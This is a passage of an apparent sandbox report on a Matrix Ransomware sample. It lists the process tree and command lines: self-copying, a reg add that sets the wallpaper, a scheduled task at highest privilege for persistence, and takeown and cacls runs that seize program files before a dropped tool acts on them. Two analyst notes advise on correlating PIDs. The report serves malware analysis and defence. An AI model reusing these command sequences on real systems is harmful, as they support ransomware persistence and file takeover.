1492 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe 47 PID 1492 wrote to memory of 824 1492 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe 47 PID 824 wrote to memory of 796 824 cmd.exe 49 PID 824 wrote to memory of 796 824 cmd.exe 49 PID 824 wrote to memory of 796 824 cmd.exe 49 PID 824 wrote to memory of 796 824 cmd.exe 49 PID 824 wrote to memory of 1516 824 cmd.exe 50 PID 824 wrote to memory of 1516 824 cmd.exe 50 PID 824 wrote to memory of 1516 824 cmd.exe 50 PID 824 wrote to memory of 1516 824 cmd.exe 50
Processes
-
C:\Users\Admin\AppData\Local\Temp\242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe"C:\Users\Admin\AppData\Local\Temp\242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe"1⤵
- Matrix Ransomware
- Modifies extensions of user files
- Loads dropped DLL
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1492 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe" "C:\Users\Admin\AppData\Local\Temp\NWGGzsKV.exe"2⤵PID:664
-
-
C:\Users\Admin\AppData\Local\Temp\NWGGzsKV.exe"C:\Users\Admin\AppData\Local\Temp\NWGGzsKV.exe" -n2⤵
- Executes dropped EXE
PID:1240
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\nH19RRW3.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
PID:936 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\nH19RRW3.bmp" /f3⤵
- Sets desktop wallpaper using registry
PID:1724
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵PID:1108
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵PID:1592
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\CFI7917d.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:1972 -
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\CFI7917d.vbs"3⤵PID:904
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\3r13J0nw.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵PID:1320
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\3r13J0nw.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Creates scheduled task(s)
PID:628
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵PID:1512
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵PID:1120
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf""2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:956 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf" /E /G Admin:F /C3⤵PID:1396
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf"3⤵
- Modifies file permissions
PID:1204
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "Dynamic.pdf" -nobanner3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1124 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "Dynamic.pdf" -nobanner4⤵
- Executes dropped EXE
PID:1084
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1144
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf""2⤵
- Suspicious use of WriteProcessMemory
PID:824 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf" /E /G Admin:F /C3⤵PID:796
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf"3⤵
- Modifies file permissions
PID:1516
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "AdobeID.pdf" -nobanner3⤵
- Loads dropped DLL
PID:1224 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "AdobeID.pdf" -nobanner4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2016 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb64.exetuXIqMZb.exe -accepteula "AdobeID.pdf" -nobanner5⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:1572
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf""2⤵
- Loads dropped DLL
PID:1740 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf" /E /G Admin:F /C3⤵PID:1712
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf"3⤵PID:1844
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner3⤵
- Loads dropped DLL
PID:1356 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner4⤵
- Executes dropped EXE
PID:1588
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:964
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf""2⤵
- Loads dropped DLL
PID:1624 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf" /E /G Admin:F /C3⤵PID:1900
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf"3⤵PID:960
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "DefaultID.pdf" -nobanner3⤵
- Loads dropped DLL
PID:1120 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "DefaultID.pdf" -nobanner4⤵
- Executes dropped EXE
PID:1396
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:588
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf""2⤵
- Loads dropped DLL
PID:528 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf" /E /G Admin:F /C3⤵PID:1160
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf"3⤵PID:796
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "ENUtxt.pdf" -nobanner3⤵
- Loads dropped DLL
PID:1516 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "ENUtxt.pdf" -nobanner4⤵
- Executes dropped EXE
PID:1324
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1556
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf""2⤵
- Loads dropped DLL
PID:1136 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf" /E /G Admin:F /C3⤵PID:772
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf"3⤵PID:692
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "SignHere.pdf" -nobanner3⤵
- Loads dropped DLL
PID:1484 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "SignHere.pdf" -nobanner4⤵
- Executes dropped EXE
PID:1240
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1252
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf""2⤵
- Loads dropped DLL
PID:1984 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf" /E /G Admin:F /C3⤵PID:964
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"3⤵PID:1740
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "StandardBusiness.pdf" -nobanner3⤵
- Loads dropped DLL
PID:2024 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "StandardBusiness.pdf" -nobanner4⤵
- Executes dropped EXE
PID:1100
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:808
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa""2⤵
- Loads dropped DLL
PID:1816 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:588
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa"3⤵PID:1624
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "classes.jsa" -nobanner3⤵
- Loads dropped DLL
PID:1648 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
PID:2012
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1084
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png""2⤵
- Loads dropped DLL
PID:1216 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png" /E /G Admin:F /C3⤵PID:1556
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:528
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "FreeCellMCE.png" -nobanner3⤵
- Loads dropped DLL
PID:832 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "FreeCellMCE.png" -nobanner4⤵
- Executes dropped EXE
PID:1184
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1844
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png""2⤵
- Loads dropped DLL
PID:1484 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png" /E /G Admin:F /C3⤵PID:460
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:956
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "HeartsMCE.png" -nobanner3⤵
- Loads dropped DLL
PID:1104 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "HeartsMCE.png" -nobanner4⤵
- Executes dropped EXE
PID:964
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:960
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Java\jre7\bin\server\classes.jsa""2⤵
- Loads dropped DLL
PID:680 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jre7\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:1356
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jre7\bin\server\classes.jsa"3⤵PID:1724
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "classes.jsa" -nobanner3⤵
- Loads dropped DLL
PID:1592 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
PID:588
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:796
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png""2⤵
- Loads dropped DLL
PID:1324 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png" /E /G Admin:F /C3⤵PID:1120
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1620
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "MahjongMCE.png" -nobanner3⤵
- Loads dropped DLL
PID:1180 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "MahjongMCE.png" -nobanner4⤵
- Executes dropped EXE
PID:1204
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1712
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Microsoft Games\Chess\ChessMCE.png""2⤵
- Loads dropped DLL
PID:1168 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Chess\ChessMCE.png" /E /G Admin:F /C3⤵PID:1216
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Chess\ChessMCE.png"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1588
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "ChessMCE.png" -nobanner3⤵
- Loads dropped DLL
PID:460 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "ChessMCE.png" -nobanner4⤵
- Executes dropped EXE
PID:804
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1776
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png""2⤵
- Loads dropped DLL
PID:2024 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png" /E /G Admin:F /C3⤵PID:1952
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1984
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "PurblePlaceMCE.png" -nobanner3⤵
- Loads dropped DLL
PID:1736 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "PurblePlaceMCE.png" -nobanner4⤵
- Executes dropped EXE
PID:1624
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1512
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""2⤵
- Loads dropped DLL
PID:2008 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C3⤵PID:1192
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1816
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "Workflow.Targets" -nobanner3⤵
- Loads dropped DLL
PID:408 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "Workflow.Targets" -nobanner4⤵
- Executes dropped EXE
PID:528
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1204
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png""2⤵
- Loads dropped DLL
PID:1184 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png" /E /G Admin:F /C3⤵PID:1848
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:848
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "SpiderSolitaireMCE.png" -nobanner3⤵
- Loads dropped DLL
PID:1824 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "SpiderSolitaireMCE.png" -nobanner4⤵
- Executes dropped EXE
PID:1144
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1740
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png""2⤵
- Loads dropped DLL
PID:956 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png" /E /G Admin:F /C3⤵PID:964
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1516
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "SolitaireMCE.png" -nobanner3⤵
- Loads dropped DLL
PID:1844 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "SolitaireMCE.png" -nobanner4⤵
- Executes dropped EXE
PID:960
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1952
Note: PID 1952 is also listed for a cacls.exe earlier in this tree and for takeown.exe and cmd.exe later on. These are short-lived processes and Windows reuses PIDs quickly, so when correlating this report with endpoint telemetry pivot on PID plus start time (or the EDR's process GUID), never on the PID alone.
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\de-DE\PDIALOG.exe.mui""2⤵
- Loads dropped DLL
PID:1984 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\de-DE\PDIALOG.exe.mui" /E /G Admin:F /C3⤵PID:1724
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\de-DE\PDIALOG.exe.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1444
Note: the "Modifies file permissions" tag is attached to only some of the takeown.exe instances in this tree, while other instances with an identical command line carry only the AdjustPrivilegeToken tag or no tag at all. The sandbox's signature tagging is therefore best-effort per process; treat the count of tagged processes as a lower bound and rely on the command lines, not the tags, when enumerating affected files.
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "PDIALOG.exe.mui" -nobanner3⤵
- Loads dropped DLL
PID:1512 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "PDIALOG.exe.mui" -nobanner4⤵
- Executes dropped EXE
PID:1424
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:324
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\es-ES\jnwmon.dll.mui""2⤵
- Loads dropped DLL
PID:864 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\es-ES\jnwmon.dll.mui" /E /G Admin:F /C3⤵PID:436
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\es-ES\jnwmon.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1620
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "jnwmon.dll.mui" -nobanner3⤵
- Loads dropped DLL
PID:1556 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "jnwmon.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:680
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1108
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\fr-FR\NBMapTIP.dll.mui""2⤵
- Loads dropped DLL
PID:1084 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\fr-FR\NBMapTIP.dll.mui" /E /G Admin:F /C3⤵PID:1588
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\fr-FR\NBMapTIP.dll.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1216
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "NBMapTIP.dll.mui" -nobanner3⤵
- Loads dropped DLL
PID:1900 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "NBMapTIP.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:1712
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1804
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\PDIALOG.exe""2⤵
- Loads dropped DLL
PID:1752 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\PDIALOG.exe" /E /G Admin:F /C3⤵PID:1744
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\PDIALOG.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1240
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "PDIALOG.exe" -nobanner3⤵
- Loads dropped DLL
PID:1356 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "PDIALOG.exe" -nobanner4⤵
- Executes dropped EXE
PID:1104
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1100
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\Templates\Shorthand.jtp""2⤵
- Loads dropped DLL
PID:2012 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Shorthand.jtp" /E /G Admin:F /C3⤵PID:1252
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Shorthand.jtp"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1396
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "Shorthand.jtp" -nobanner3⤵
- Loads dropped DLL
PID:528 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "Shorthand.jtp" -nobanner4⤵
- Executes dropped EXE
PID:1180
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
